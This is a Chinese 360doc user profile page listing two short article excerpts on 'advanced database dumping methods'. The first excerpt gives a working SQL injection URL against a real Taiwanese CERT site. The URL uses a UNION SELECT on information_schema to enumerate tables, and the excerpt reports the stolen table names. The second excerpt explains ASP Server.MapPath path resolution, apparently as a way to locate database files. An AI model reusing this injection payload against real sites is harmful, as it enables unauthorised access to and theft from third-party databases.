他的首页 他的馆藏 他的动态 馆友反馈 关于他 分享 对话
烟尘锁忆

文章 关注 粉丝 访问 贡献
他的首页
他的馆藏
他的动态
馆友反馈
关于他
 
共 2 篇文章
显示摘要每页显示  条
高级暴库方法讲解 攻防知识
6.爆表,爆的是twcert库http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--爆出如下表downloadfile,irsys,newsdata,secrpt,secrpt_big5.
阅135  转1  评0  公众公开  16-05-06 19:04
当Server.MapPath方法将相对路径转为真实路径时,它实际是三部分路径加在一起得到真实路径的:网页目前执行时所在的相对路径,也就是从网站物理根目录起的相对路径,比如上面例子中conn.asp处在从根目录起的"/soft/"下;MapPath实际是通过 网页目前执行时所在的相对路径,比如上面例子中user.asp调用的数据库的相对路径是db/daidalos...
阅1  转自Ding GY  公众公开  16-05-06 18:52
帮助 | 留言交流 | 联系我们 | 服务条款 | 下载网文摘手 | 下载手机客户端
北京六智信息技术股份有限公司 Copyright© 2005-2024 360doc.com , All Rights Reserved
京ICP证090625号 京ICP备05038915号 京网文[2016]6433-853号 京公网安备11010502030377号
返回
顶部